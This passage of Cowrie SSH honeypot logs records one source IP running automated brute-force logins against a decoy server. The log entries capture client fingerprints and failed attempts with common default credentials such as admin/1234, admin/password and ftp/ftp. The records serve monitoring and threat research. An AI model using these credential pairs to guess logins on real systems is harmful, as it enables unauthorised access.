.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:01:55.238254Z","src_ip":"212.227.235.229","session":"d6f3700ee419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41728,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4b6b46c7c7e","protocol":"ssh","message":"New connection: 212.227.235.229:41728 (1.2.3.4:22) [session: c4b6b46c7c7e]","sensor":"my-vps","timestamp":"2025-08-26T21:01:59.825300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:01:59.915006Z","src_ip":"212.227.235.229","session":"c4b6b46c7c7e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:00.045144Z","src_ip":"212.227.235.229","session":"d6f3700ee419"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:02.039375Z","src_ip":"212.227.235.229","session":"d6f3700ee419"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:03.193211Z","src_ip":"212.227.235.229","session":"c4b6b46c7c7e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:04.195686Z","src_ip":"212.227.235.229","session":"c4b6b46c7c7e"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:05.514941Z","src_ip":"212.227.235.229","session":"c4b6b46c7c7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41744,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bca3310c849","protocol":"ssh","message":"New connection: 212.227.235.229:41744 (1.2.3.4:22) [session: 4bca3310c849]","sensor":"my-vps","timestamp":"2025-08-26T21:02:06.993418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:07.037167Z","src_ip":"212.227.235.229","session":"4bca3310c849"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:08.572934Z","src_ip":"212.227.235.229","session":"4bca3310c849"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46762,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fea073121e2","protocol":"ssh","message":"New connection: 212.227.235.229:46762 (1.2.3.4:22) [session: 8fea073121e2]","sensor":"my-vps","timestamp":"2025-08-26T21:02:09.904058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:09.912333Z","src_ip":"212.227.235.229","session":"8fea073121e2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:11.964208Z","src_ip":"212.227.235.229","session":"8fea073121e2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:14.380385Z","src_ip":"212.227.235.229","session":"8fea073121e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46774,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad1a5f1fd46","protocol":"ssh","message":"New connection: 212.227.235.229:46774 (1.2.3.4:22) [session: cad1a5f1fd46]","sensor":"my-vps","timestamp":"2025-08-26T21:02:14.528662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:14.530332Z","src_ip":"212.227.235.229","session":"cad1a5f1fd46"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:15.067237Z","src_ip":"212.227.235.229","session":"cad1a5f1fd46"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:16.250168Z","src_ip":"212.227.235.229","session":"8fea073121e2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:16.841766Z","src_ip":"212.227.235.229","session":"cad1a5f1fd46"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:18.174098Z","src_ip":"212.227.235.229","session":"cad1a5f1fd46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56710,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e883a262768","protocol":"ssh","message":"New connection: 212.227.235.229:56710 (1.2.3.4:22) [session: 9e883a262768]","sensor":"my-vps","timestamp":"2025-08-26T21:02:18.997129Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:19.716143Z","src_ip":"212.227.235.229","session":"4bca3310c849"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:22.679217Z","src_ip":"212.227.235.229","session":"9e883a262768"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:22.679926Z","src_ip":"212.227.235.229","session":"9e883a262768"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:25.854148Z","src_ip":"212.227.235.229","session":"9e883a262768"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:27.569843Z","src_ip":"212.227.235.229","session":"9e883a262768"}
{"eventid":"cowrie.session.closed","duration":"32.5","message":"Connection lost after 32.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:02:39.513855Z","src_ip":"212.227.235.229","session":"4bca3310c849"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60614,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ef2d088d5d8","protocol":"ssh","message":"New connection: 212.227.235.229:60614 (1.2.3.4:22) [session: 2ef2d088d5d8]","sensor":"my-vps","timestamp":"2025-08-26T21:02:49.131517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:02:49.133352Z","src_ip":"212.227.235.229","session":"2ef2d088d5d8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:02:49.598792Z","src_ip":"212.227.235.229","session":"2ef2d088d5d8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:02:53.039455Z","src_ip":"212.227.235.229","session":"2ef2d088d5d8"}
